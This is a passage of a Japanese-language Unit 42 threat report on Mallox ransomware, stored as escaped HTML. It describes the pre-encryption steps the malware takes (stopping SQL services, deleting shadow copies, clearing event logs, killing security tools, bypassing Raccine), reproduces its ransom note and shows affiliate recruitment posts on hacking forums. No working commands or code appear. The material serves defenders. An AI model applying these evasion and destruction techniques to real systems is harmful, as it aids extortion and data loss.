id=\"post-129319-_plabvtenx72j\"><\/a>\u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u306e\u5b9f\u884c<\/h2>\n<p>\u3053\u306e\u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001\u6697\u53f7\u5316\u306e\u524d\u306b\u4ee5\u4e0b\u306b\u3042\u3052\u308b\u8907\u6570\u306e\u30a2\u30af\u30b7\u30e7\u30f3\u3092\u8a66\u307f\u308b\u3053\u3068\u3067\u3001\u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u304c\u78ba\u5b9f\u306b\u5b9f\u884c\u3055\u308c\u308b\u3088\u3046\u306b\u3057\u307e\u3059\u3002<\/p>\n<ul>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">sc.exe<\/span> \u3068 <span style=\"font-family: 'courier new', courier, monospace;\">net.exe<\/span> \u3092\u4f7f\u3063\u3066 SQL \u95a2\u9023\u30b5\u30fc\u30d3\u30b9\u306e\u505c\u6b62\u30fb\u524a\u9664\u3092\u8a66\u307f\u308b (\u5b8c\u5168\u306a\u30b3\u30de\u30f3\u30c9 \u30e9\u30a4\u30f3\u306f<a href=\"#post-129319-_nug33n70cwpd\">\u4ed8\u9332<\/a>\u3092\u53c2\u7167)\u3002\u3053\u308c\u306b\u3088\u308a\u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u306f\u88ab\u5bb3\u8005\u306e\u30d5\u30a1\u30a4\u30eb \u30c7\u30fc\u30bf\u3078\u306e\u30a2\u30af\u30bb\u30b9\u3068\u6697\u53f7\u5316\u3092\u884c\u3048\u308b\u3088\u3046\u306b\u306a\u308b<\/li>\n<li>\u30dc\u30ea\u30e5\u30fc\u30e0 \u30b7\u30e3\u30c9\u30a6\u3092\u524a\u9664\u3057\u3088\u3046\u3068\u3059\u308b\u3002\u3053\u308c\u306b\u3088\u308a\u30d5\u30a1\u30a4\u30eb\u304c\u6697\u53f7\u5316\u3055\u308c\u305f\u3042\u3068\u306e\u5fa9\u5143\u3092\u56f0\u96e3\u306b\u3059\u308b\u3002\u3053\u306e\u30a2\u30e9\u30fc\u30c8\u304c Cortex XDR \/ XSIAM \u3067\u3069\u306e\u3088\u3046\u306b\u8868\u793a\u3055\u308c\u308b\u304b\u306b\u3064\u3044\u3066\u306f\u3001\u56f3 6 \u3092\u53c2\u7167\u306e\u3053\u3068<\/li>\n<\/ul>\n<figure id=\"attachment_129277\" aria-describedby=\"caption-attachment-129277\" style=\"width: 660px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-129277 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2023\/07\/word-image-129264-6.png\" alt=\"\u753b\u50cf 6 \u306f\u3001Cortex XDR \/ XSIAM \u306e Alert Name (\u30a2\u30e9\u30fc\u30c8\u540d) \u306e\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8\u3067\u3059\u3002Alert Name \u306f\u300cProcess request for deletion of windows, shadow copies. (\u30a6\u30a3\u30f3\u30c9\u30a6\u3001\u30b7\u30e3\u30c9\u30a6 \u30b3\u30d4\u30fc\u306e\u524a\u9664\u306e\u51e6\u7406\u8981\u6c42)\u300d\u3067\u3001Category (\u30ab\u30c6\u30b4\u30ea\u30fc) \u306f\u300cTampering (\u6539\u3056\u3093)\u300d\u3067\u3059\u3002\" width=\"660\" height=\"66\" \/><figcaption id=\"caption-attachment-129277\" class=\"wp-caption-text\">\u56f36. Cortex XDR \/ XSIAM \u304c\u751f\u6210\u3057\u305f\u30b7\u30e3\u30c9\u30a6 \u30b3\u30d4\u30fc\u306e\u524a\u9664\u306b\u95a2\u3059\u308b\u30a2\u30e9\u30fc\u30c8<\/figcaption><\/figure>\n<ul>\n<li>Microsoft \u306e <span style=\"font-family: 'courier new', courier, monospace;\"><a href=\"https:\/\/learn.microsoft.com\/ja-jp\/windows-server\/administration\/windows-commands\/wevtutil\" target=\"_blank\" rel=\"noopener\">wevtutil<\/a><\/span> \u30b3\u30de\u30f3\u30c9 \u30e9\u30a4\u30f3 \u30e6\u30fc\u30c6\u30a3\u30ea\u30c6\u30a3\u3092\u4f7f\u3044\u3001\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3 \u30ed\u30b0\u3001\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3 \u30ed\u30b0\u3001\u30bb\u30c3\u30c8\u30a2\u30c3\u30d7 \u30ed\u30b0\u3001\u30b7\u30b9\u30c6\u30e0 \u30a4\u30d9\u30f3\u30c8 \u30ed\u30b0\u3092\u6d88\u53bb\u3092\u8a66\u307f\u3001\u691c\u51fa\u3084\u30d5\u30a9\u30ec\u30f3\u30b8\u30c3\u30af\u5206\u6790\u51e6\u7406\u3092\u59a8\u5bb3\u3059\u308b<\/li>\n<li>Windows \u7d44\u307f\u8fbc\u307f\u306e <span style=\"font-family: 'courier new', courier, monospace;\"><a href=\"https:\/\/learn.microsoft.com\/ja-jp\/windows-server\/administration\/windows-commands\/takeown\" target=\"_blank\" rel=\"noopener\">takeown.exe<\/a><\/span> \u30b3\u30de\u30f3\u30c9\u3092\u4f7f\u3063\u3066\u30d5\u30a1\u30a4\u30eb\u306e\u30a2\u30af\u30bb\u30b9\u8a31\u53ef\u3092\u5909\u66f4\u3057\u3001<span style=\"font-family: 'courier new', courier, monospace;\">cmd.exe<\/span>\u3084\u305d\u306e\u307b\u304b\u306e\u4e3b\u8981\u306a\u30b7\u30b9\u30c6\u30e0 \u30d7\u30ed\u30bb\u30b9\u3078\u306e\u30a2\u30af\u30bb\u30b9\u3092\u62d2\u5426\u3059\u308b<\/li>\n<li>\u30b7\u30b9\u30c6\u30e0\u7ba1\u7406\u8005\u304c <span style=\"font-family: 'courier new', courier, monospace;\">bcdedit.exe<\/span> \u30b3\u30de\u30f3\u30c9\u3092\u4f7f\u3063\u3066\u30b7\u30b9\u30c6\u30e0 \u30a4\u30e1\u30fc\u30b8 \u30ea\u30ab\u30d0\u30ea\u30fc\u6a5f\u80fd\u3092\u624b\u52d5\u3067\u30ed\u30fc\u30c9\u3067\u304d\u306a\u3044\u3088\u3046\u306b\u3059\u308b<\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">taskkill.exe<\/span> \u3092\u4f7f\u3063\u3066\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u95a2\u9023\u306e\u30d7\u30ed\u30bb\u30b9\u3084\u30b5\u30fc\u30d3\u30b9\u3092\u7d42\u4e86\u3092\u3055\u305b\u3001\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3 \u30bd\u30ea\u30e5\u30fc\u30b7\u30e7\u30f3\u3092\u56de\u907f\u3057\u3088\u3046\u3068\u3059\u308b<\/li>\n<li><a href=\"https:\/\/github.com\/Neo23x0\/Raccine\" target=\"_blank\" rel=\"noopener\">Raccine<\/a> \u306e\u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u5bfe\u7b56\u88fd\u54c1\u304c\u5b58\u5728\u3059\u308b\u5834\u5408\u306f\u305d\u306e\u30ec\u30b8\u30b9\u30c8\u30ea\u30ad\u30fc\u3092\u524a\u9664\u3059\u308b\u3053\u3068\u3067\u3053\u308c\u3092\u56de\u907f\u3057\u3088\u3046\u3068\u3059\u308b\u3002\u3053\u306e\u30d7\u30ed\u30bb\u30b9\u306e\u4f8b\u306b\u3064\u3044\u3066\u306f\u3001\u56f3 7 \u53c2\u7167\u306e\u3053\u3068<\/li>\n<\/ul>\n<figure id=\"attachment_129279\" aria-describedby=\"caption-attachment-129279\" style=\"width: 370px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-129279 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2023\/07\/word-image-129264-7.png\" alt=\"\u753b\u50cf 7 \u306f\u3001Raccine \u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u5bfe\u7b56\u88fd\u54c1\u3092\u30d0\u30a4\u30d1\u30b9\u3057\u3088\u3046\u3068\u3059\u308b\u30b3\u30fc\u30c9\u306e\u6570\u884c\u306e\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8\u3067\u3059\u3002\" width=\"370\" height=\"124\" \/><figcaption id=\"caption-attachment-129279\" class=\"wp-caption-text\">\u56f37. Raccin \u306e\u30ec\u30b8\u30b9\u30c8\u30ea \u30ad\u30fc\u3092\u524a\u9664\u3057\u3066\u3044\u308b<\/figcaption><\/figure>\n<p>\u524d\u8ff0\u306e\u30a2\u30af\u30c6\u30a3\u30d3\u30c6\u30a3\u306e\u4e00\u90e8\u3092\u56f3 8 \u306e\u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u306e\u30d7\u30ed\u30bb\u30b9 \u30c4\u30ea\u30fc\u306b\u793a\u3057\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_129281\" aria-describedby=\"caption-attachment-129281\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-129281 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2023\/07\/word-image-129264-8.png\" alt=\"\u753b\u50cf 8 \u306f\u3001Cortex XDR \/ XSIAM \u306b\u304a\u3051\u308b Mallox \u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u653b\u6483\u306e\u5b8c\u5168\u306a\u30d7\u30ed\u30bb\u30b9 \u30c4\u30ea\u30fc\u306e\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8\u3067\u3059\u3002\u30c4\u30ea\u30fc\u306f\u6700\u7d42\u7684\u306b 5 \u3064\u306e\u30d6\u30e9\u30f3\u30c1\u306b\u5206\u304b\u308c\u307e\u3059\u3002\" width=\"900\" height=\"366\" \/><figcaption id=\"caption-attachment-129281\" class=\"wp-caption-text\">\u56f38. Cortex XDR \/ XSIAM \u3067\u653b\u6483\u306e\u5b8c\u5168\u306a\u30d7\u30ed\u30bb\u30b9 \u30c4\u30ea\u30fc\u3092\u8868\u793a\u3057\u305f\u3068\u3053\u308d\u3002\u3053\u3053\u3067\u306f\u691c\u8a3c\u306e\u305f\u3081\u300c\u691c\u51fa\u306e\u307f\u300d\u306e\u30e2\u30fc\u30c9\u306b\u8a2d\u5b9a\u3057\u3066\u3042\u308b<\/figcaption><\/figure>\n<p>\u4eca\u56de\u8abf\u67fb\u3057\u305f Mallox \u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u306e\u30b5\u30f3\u30d7\u30eb\u306f\u3001ChaCha20 \u6697\u53f7\u5316\u30a2\u30eb\u30b4\u30ea\u30ba\u30e0\u3067\u30d5\u30a1\u30a4\u30eb\u3092\u6697\u53f7\u5316\u3057\u3001\u6697\u53f7\u5316\u3055\u308c\u305f\u30d5\u30a1\u30a4\u30eb\u306e\u62e1\u5f35\u5b50\u3068\u3057\u3066 <span style=\"font-family: 'courier new', courier, monospace;\">.malox<\/span> \u3092\u30a2\u30da\u30f3\u30c9\u3057\u307e\u3059\u3002\u88ab\u5bb3\u8005\u306e\u540d\u524d\u3092\u62e1\u5f35\u5b50\u3068\u3057\u3066\u4f7f\u3046\u307b\u304b\u3001<span style=\"font-family: 'courier new', courier, monospace;\">.FARGO3<\/span>\u3001<span style=\"font-family: 'courier new', courier, monospace;\">.exploit<\/span>\u3001<span style=\"font-family: 'courier new', courier, monospace;\">.avast<\/span>\u3001<span style=\"font-family: 'courier new', courier, monospace;\">.bitenc<\/span>\u3001<span style=\"font-family: 'courier new', courier, monospace;\">.xollam<\/span> \u306a\u3069\u306e\u30d5\u30a1\u30a4\u30eb\u62e1\u5f35\u5b50\u3082\u89b3\u6e2c\u3055\u308c\u3066\u3044\u307e\u3059\u3002Cortex XDR \u4e0a\u3067\u6697\u53f7\u5316\u3055\u308c\u305f\u30d5\u30a1\u30a4\u30eb\u3092\u8868\u793a\u3057\u305f\u30b5\u30f3\u30d7\u30eb\u306f\u56f3 9 \u3092\u53c2\u7167\u3057\u3066\u304f\u3060\u3055\u3044\u3002<\/p>\n<figure id=\"attachment_129283\" aria-describedby=\"caption-attachment-129283\" style=\"width: 613px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-129283 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2023\/07\/word-image-129264-9.png\" alt=\"\u753b\u50cf 9 \u306f\u3001Cortex XDR \u306e\u753b\u9762\u3067\u3001 2 \u3064\u306e\u5217\u304c\u8868\u793a\u3055\u308c\u3066\u3044\u308b\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8\u3067\u3059\u30021 \u5217\u76ee\u306e\u540d\u524d\u306f\u300cACTION_TYPE (\u30a2\u30af\u30b7\u30e7\u30f3 \u30bf\u30a4\u30d7)\u300d\u3067\u3059\u30022 \u5217\u76ee\u306e\u540d\u524d\u306f\u300cFILE_NAME (\u30d5\u30a1\u30a4\u30eb\u540d)\u300d\u3067\u3059\u3002\u3053\u3053\u306b\u3042\u304c\u3063\u3066\u3044\u308b\u30d5\u30a1\u30a4\u30eb\u306f\u3001Mallox \u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u306b\u3088\u3063\u3066\u6697\u53f7\u5316\u3055\u308c\u3066\u3044\u307e\u3059\u3002\" width=\"613\" height=\"454\" \/><figcaption id=\"caption-attachment-129283\" class=\"wp-caption-text\">\u56f39. Mallox \u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u306b\u3088\u3063\u3066\u6697\u53f7\u5316\u3055\u308c\u305f\u30d5\u30a1\u30a4\u30eb\u306e\u4f8b\u3002Cortex XDR (\u300c\u691c\u51fa\u306e\u307f\u300d\u30e2\u30fc\u30c9\u306b\u8a2d\u5b9a) \u304c\u691c\u51fa\u3057\u305f\u3082\u306e<\/figcaption><\/figure>\n<p>Mallox \u306f\u3001\u88ab\u5bb3\u8005\u306e\u30c9\u30e9\u30a4\u30d6\u4e0a\u306e\u3059\u3079\u3066\u306e\u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u30fc\u306b\u8eab\u4ee3\u91d1\u8981\u6c42\u30e1\u30e2\u3092\u6b8b\u3057\u307e\u3059\u3002\u3053\u306e\u8eab\u4ee3\u91d1\u8981\u6c42\u30e1\u30e2\u306b\u306f\u611f\u67d3\u306e\u8aac\u660e\u3068\u9023\u7d61\u5148\u60c5\u5831\u304c\u8a18\u8f09\u3055\u308c\u3066\u3044\u307e\u3059\u3002\u56f3 10 \u306f\u3001\u3053\u308c\u3089\u306e\u8eab\u4ee3\u91d1\u8981\u6c42\u30e1\u30e2\u306e\u4e00\u4f8b\u3067\u3059\u3002<\/p>\n<p><figure id=\"attachment_129285\" aria-describedby=\"caption-attachment-129285\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-129285 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2023\/07\/word-image-129264-10.png\" alt=\"\u753b\u50cf 10 \u306f\u3001Mallox \u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u306e\u30e1\u30e2\u306e\u4e00\u4f8b\u3067\u3059\u3002Hello, your files are encrypted and cannot be used. (\u3053\u3093\u306b\u3061\u306f\u3002\u30d5\u30a1\u30a4\u30eb\u306f\u6697\u53f7\u5316\u3055\u308c\u3066\u3044\u308b\u305f\u3081\u4f7f\u7528\u3067\u304d\u307e\u305b\u3093\u3002)To return your files in work condition you need decryption tool. (\u30d5\u30a1\u30a4\u30eb\u3092\u6b63\u5e38\u306a\u72b6\u614b\u306b\u623b\u3059\u306b\u306f\u3001\u5fa9\u53f7\u30c4\u30fc\u30eb\u304c\u5fc5\u8981\u3067\u3059\u3002)Follow the instructions to decrypt all your data. (\u6307\u793a\u306b\u5f93\u3044\u3001\u3059\u3079\u3066\u306e\u30c7\u30fc\u30bf\u3092\u5fa9\u53f7\u3057\u3066\u304f\u3060\u3055\u3044\u3002)Do not try to change or restore files yourself, this will break them. (\u30d5\u30a1\u30a4\u30eb\u304c\u7834\u640d\u3059\u308b\u53ef\u80fd\u6027\u304c\u3042\u308b\u306e\u3067\u81ea\u5206\u3067\u30d5\u30a1\u30a4\u30eb\u3092\u5909\u66f4\u30fb\u5fa9\u5143\u3057\u3088\u3046\u3068\u3057\u306a\u3044\u3067\u304f\u3060\u3055\u3044\u3002)If you want, on our site, you can decrypt one file for free. (\u3054\u5e0c\u671b\u304c\u3042\u308c\u3070\u3001\u5f0a\u793e\u30b5\u30a4\u30c8\u3067\u30d5\u30a1\u30a4\u30eb\u3092 1 \u3064\u7121\u6599\u3067\u5fa9\u53f7\u3067\u304d\u307e\u3059\u3002)Free test decryption allowed only for not valuable file with size less than 3MB. (\u7121\u6599\u306e\u30c6\u30b9\u30c8\u5fa9\u53f7\u306b\u4f7f\u3048\u308b\u306e\u306f\u30b5\u30a4\u30ba\u304c 3MB \u672a\u6e80\u306e\u4fa1\u5024\u306e\u306a\u3044\u30d5\u30a1\u30a4\u30eb\u306e\u307f\u3067\u3059\u3002)How to get decryption tool: 1. (\u5fa9\u53f7\u30c4\u30fc\u30eb\u306e\u5165\u624b\u65b9\u6cd5: 1.)Download and install Tor browser by this link [Tor link]. (\u3053\u306e\u30ea\u30f3\u30af [Tor \u30ea\u30f3\u30af] \u304b\u3089 Tor \u30d6\u30e9\u30a6\u30b6\u30fc\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u3066\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3057\u307e\u3059\u3002)2: If Tor blocked in your country and you can't access to the link use any VPN software. (2: \u304a\u4f4f\u307e\u3044\u306e\u56fd\u3067 Tor \u304c\u30d6\u30ed\u30c3\u30af\u3055\u308c\u3044\u3066\u30ea\u30f3\u30af\u306b\u30a2\u30af\u30bb\u30b9\u3067\u304d\u306a\u3044\u5834\u5408\u306f VPN \u30bd\u30d5\u30c8\u30a6\u30a7\u30a2\u3092\u4f7f\u3063\u3066\u304f\u3060\u3055\u3044\u3002)3. Run Tor browser and open the site. (Tor \u30d6\u30e9\u30a6\u30b6\u30fc\u3092\u5b9f\u884c\u3057\u3001\u30b5\u30a4\u30c8\u3092\u958b\u304d\u307e\u3059\u3002)4. Copy your private ID in the input field. (\u5165\u529b\u30d5\u30a3\u30fc\u30eb\u30c9\u306b\u3054\u81ea\u8eab\u306e\u30d7\u30e9\u30a4\u30d9\u30fc\u30c8 ID \u3092\u30b3\u30d4\u30fc\u3057\u307e\u3059\u3002)Your private key (this portion is blurred). (\u3042\u306a\u305f\u306e\u79d8\u5bc6\u9375\u306f\u25a0\u25a0\u25a0\u3067\u3059)\u30025. You will see payment information and we can make free test decryption here. (\u652f\u6255\u3044\u60c5\u5831\u304c\u8868\u793a\u3055\u308c\u3001\u3053\u3053\u3067\u7121\u6599\u306e\u30c6\u30b9\u30c8\u5fa9\u53f7\u3092\u884c\u3048\u307e\u3059\u3002)Our blog of leaked companies [this is an Onion link]. \u5f0a\u793e\u306e\u30ea\u30fc\u30af \u30b5\u30a4\u30c8 [Onion \u30ea\u30f3\u30af] \u306f\u3053\u3061\u3089\u3002If you are unable to contact us through the site, then you can email us: [this is an email at onionmail[.]org.] If you are unable to contact us through the site, waiting for a response via email can be several days. (\u30b5\u30a4\u30c8\u7d4c\u7531\u3067\u9023\u7d61\u3067\u304d\u306a\u3044\u5834\u5408\u306f\u3001\u6b21\u306e\u96fb\u5b50\u30e1\u30fc\u30eb\u306b\u3054\u9023\u7d61\u304f\u3060\u3055\u3044: [onionmail[.]org \u306e\u96fb\u5b50\u30e1\u30fc\u30eb]\u3002 \u30b5\u30a4\u30c8\u7d4c\u7531\u3067\u9023\u7d61\u3067\u304d\u306a\u3044\u5834\u5408\u3001\u96fb\u5b50\u30e1\u30fc\u30eb\u3067\u306e\u5fdc\u7b54\u306b\u306f\u6570\u65e5\u304b\u304b\u308b\u5834\u5408\u304c\u3042\u308a\u307e\u3059\u3002)Do not use it if you have not tried contacting through the site. (\u307e\u305a\u306f\u5fc5\u305a\u30b5\u30a4\u30c8\u7d4c\u7531\u3067\u306e\u9023\u7d61\u3092\u8a66\u3057\u3066\u304b\u3089\u96fb\u5b50\u30e1\u30fc\u30eb\u3092\u4f7f\u3063\u3066\u304f\u3060\u3055\u3044\u3002)\" width=\"900\" height=\"321\" \/><figcaption id=\"caption-attachment-129285\" class=\"wp-caption-text\">\u56f310. Mallox \u306e\u8eab\u4ee3\u91d1\u8981\u6c42\u30e1\u30e2\u306e\u30b5\u30f3\u30d7\u30eb<\/figcaption><\/figure>\u5b9f\u884c\u5f8c\u306b\u30de\u30eb\u30a6\u30a7\u30a2\u306f\u81ea\u5206\u81ea\u8eab\u3092\u524a\u9664\u3057\u307e\u3059\u3002<\/p>\n<h2><a id=\"post-129319-_fi88dab5e59o\"><\/a>\u30aa\u30da\u30ec\u30fc\u30b7\u30e7\u30f3\u62e1\u5927\u3078<\/h2>\n<p><a href=\"https:\/\/www.suspectfile.com\/interview-with-mallox-ransomware-group\/\">\u3042\u308b\u30e1\u30f3\u30d0\u30fc\u3044\u308f\u304f<\/a>\u30012023 \u5e74 1 \u6708\u306e\u30a4\u30f3\u30bf\u30d3\u30e5\u30fc\u3067\u3082\u8ff0\u3079\u3089\u308c\u3066\u3044\u305f\u3068\u304a\u308a\u3001Mallox \u306f\u6bd4\u8f03\u7684\u5c0f\u898f\u6a21\u3067\u9589\u9396\u7684\u306a\u30b0\u30eb\u30fc\u30d7\u306e\u3088\u3046\u3067\u3059\u3002\u305f\u3060\u3057\u3053\u306e\u30b0\u30eb\u30fc\u30d7\u306f\u30a2\u30d5\u30a3\u30ea\u30a8\u30a4\u30c8\u3092\u52df\u96c6\u3057\u3001\u30aa\u30da\u30ec\u30fc\u30b7\u30e7\u30f3\u306e\u62e1\u5927\u3092\u56f3\u308d\u3046\u3068\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n<p>\u3053\u306e\u30a4\u30f3\u30bf\u30d3\u30e5\u30fc\u306e\u6570\u65e5\u5f8c\u3001<span style=\"font-family: 'courier new', courier, monospace;\">Mallx<\/span> \u3068\u3044\u3046\u540d\u524d\u306e\u30e6\u30fc\u30b6\u30fc\u304c\u3001\u30cf\u30c3\u30ad\u30f3\u30b0 \u30d5\u30a9\u30fc\u30e9\u30e0\u306e RAMP \u306b\u3001\u300cMallox \u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2 \u30b0\u30eb\u30fc\u30d7\u306f\u65b0\u3057\u3044 Mallox ransomware-as-a-service (RaaS) \u30a2\u30d5\u30a3\u30ea\u30a8\u30a4\u30c8 \u30d7\u30ed\u30b0\u30e9\u30e0\u306e\u30a2\u30d5\u30a3\u30ea\u30a8\u30a4\u30c8\u3092\u52df\u96c6\u3057\u3066\u3044\u308b\u300d\u3068\u6295\u7a3f\u3057\u307e\u3057\u305f (\u56f3 11)\u3002<\/p>\n<figure id=\"attachment_129287\" aria-describedby=\"caption-attachment-129287\" style=\"width: 908px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-129287 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2023\/07\/word-image-129264-11.png\" alt=\"\u753b\u50cf 11 \u306f\u3001\u30e6\u30fc\u30b6\u30fc Mallx \u306b\u3088\u308b\u30cf\u30c3\u30ad\u30f3\u30b0 \u30d5\u30a9\u30fc\u30e9\u30e0 RAMP \u3078\u306e\u6295\u7a3f\u306e\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8\u3067\u3059\u3002\u3053\u306e\u6295\u7a3f\u306f\u3001Malox \u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2 \u30c1\u30fc\u30e0\u306b\u30da\u30f3\u30c6\u30b9\u30bf\u30fc\u3068\u3057\u3066\u53c2\u52a0\u3059\u308b\u3088\u3046\u4e0d\u7279\u5b9a\u591a\u6570\u3092\u62db\u5f85\u3057\u3066\u304a\u308a\u3001\u7279\u5fb4\u3084\u6761\u4ef6\u306a\u3069\u306e\u5fdc\u52df\u8981\u4ef6\u306e\u307b\u304b\u3001\u5229\u76ca\u914d\u5206\u3084\u30a2\u30af\u30c6\u30a3\u30d6\u3067\u306a\u3044\u53c2\u52a0\u8005\u304c\u4f55\u3092\u671f\u5f85\u3059\u3079\u304d\u304b\u306a\u3069\u3092\u8a18\u8f09\u3057\u3066\u3044\u307e\u3059\u3002\u6700\u5f8c\u306b\u9023\u7d61\u5148\u60c5\u5831\u3092\u8a18\u8f09\u3057\u3066\u3042\u308a\u307e\u3059\u3002\" width=\"908\" height=\"454\" \/><figcaption id=\"caption-attachment-129287\" class=\"wp-caption-text\">\u56f311 \u30e6\u30fc\u30b6\u30fc <span style=\"font-family: 'courier new', courier, monospace;\">Mallx<\/span> \u306b\u3088\u308b RAMP \u3078\u306e\u6295\u7a3f<\/figcaption><\/figure>\n<p>\u9061\u3063\u3066 2022 \u5e74 5 \u6708\u306b\u306f\u3001<span style=\"font-family: 'courier new', courier, monospace;\">RansomR<\/span> \u3068\u3044\u3046\u540d\u524d\u306e\u30e6\u30fc\u30b6\u30fc\u304c\u3001\u6709\u540d\u30cf\u30c3\u30ad\u30f3\u30b0 \u30d5\u30a9\u30fc\u30e9\u30e0 <span style=\"font-family: 'courier new', courier, monospace;\">nulled[.]to<\/span> \u306b\u300cMallox \u30b0\u30eb\u30fc\u30d7\u304c\u30c1\u30fc\u30e0\u306b\u53c2\u52a0\u3059\u308b\u30a2\u30d5\u30a3\u30ea\u30a8\u30a4\u30c8\u3092\u63a2\u3057\u3066\u3044\u308b\u300d\u3068\u6295\u7a3f\u3057\u3066\u3044\u307e\u3057\u305f\u3002\u30b9\u30ec\u30c3\u30c9\u5185\u306e\u30b3\u30e1\u30f3\u30c8\u306b\u3088\u308b\u3068\u30012023 \u5e74 6 \u6708\u6642\u70b9\u3067\u3082\u53c2\u52a0\u30aa\u30d7\u30b7\u30e7\u30f3\u306f\u6709\u52b9\u306e\u307e\u307e\u3067\u3059\u3002<\/p>\n<figure id=\"attachment_129289\" aria-describedby=\"caption-attachment-129289\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-129289 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2023\/07\/word-image-129264-12.png\" alt=\"\u753b\u50cf 12 \u306f\u3001\u30cf\u30c3\u30ad\u30f3\u30b0 \u30d5\u30a9\u30fc\u30e9\u30e0 Nulled \u3078\u306e RansomR \u306b\u3088\u308b\u6295\u7a3f\u306e\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8\u3067\u3059\u3002\u3053\u308c\u306f 2022 \u5e74 3 \u6708\u306b\u6295\u7a3f\u3055\u308c\u305f\u3082\u306e\u3067\u3001\u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2 \u30b9\u30bf\u30c3\u30d5\u52df\u96c6\u3068\u66f8\u304b\u308c\u3066\u3044\u307e\u3059\u3002RaaS - \u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u306f\u30b5\u30fc\u30d3\u30b9\u3068\u3057\u3066\u306e\u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u306e\u3053\u3068\u3067\u3059\u3002\u300c\u3059\u3067\u306b\u88ab\u5bb3\u8005\u3084\u4f01\u696d\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u306b\u30a2\u30af\u30bb\u30b9\u3067\u304d\u308b\u4eba\u3001\u305d\u306e\u3088\u3046\u306a\u8cc7\u6599\u3092\u5165\u624b\u3059\u308b\u65b9\u6cd5\u3092\u77e5\u3063\u3066\u3044\u308b\u4eba\u300d\u3092\u6c42\u3081\u3066\u3044\u307e\u3059\u3002\u6b21\u306b\u3001Jabber \u3068 TOX\u3001\u304a\u3088\u3073 MALLOX \u306e\u9023\u7d61\u5148\u60c5\u5831\u304c\u3059\u3079\u3066\u5927\u6587\u5b57\u3067\u4e0b\u90e8\u306b\u8868\u793a\u3055\u308c\u3066\u3044\u307e\u3059\u3002\" width=\"900\" height=\"230\" \/><figcaption id=\"caption-attachment-129289\" class=\"wp-caption-text\">\u56f312. <span style=\"font-family: 'courier new', courier, monospace;\">RansomR<\/span> \u306b\u3088\u308b Nulled \u3078\u306e\u6295\u7a3f<\/figcaption><\/figure>\n<p>\u30a2\u30d5\u30a3\u30ea\u30a8\u30a4\u30c8 \u30d7\u30ed\u30b0\u30e9\u30e0\u306e\u6c42\u4eba\u6d3b\u52d5\u304c\u3046\u307e\u304f\u3044\u3051\u3070 Mallox \u30b0\u30eb\u30fc\u30d7\u306f\u52e2\u529b\u3092\u306e\u3070\u3057\u3001\u3088\u308a\u591a\u304f\u306e\u7d44\u7e54\u3092\u6a19\u7684\u306b\u3059\u308b\u53ef\u80fd\u6027\u304c\u3042\u308a\u307e\u3059\u3002<\/p>\n<h2><a id=\"post-129319-_w1hq67ad9i9y\"><\/a>\u7d50\u8ad6<\/h2>\n<p>Mallox \u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2 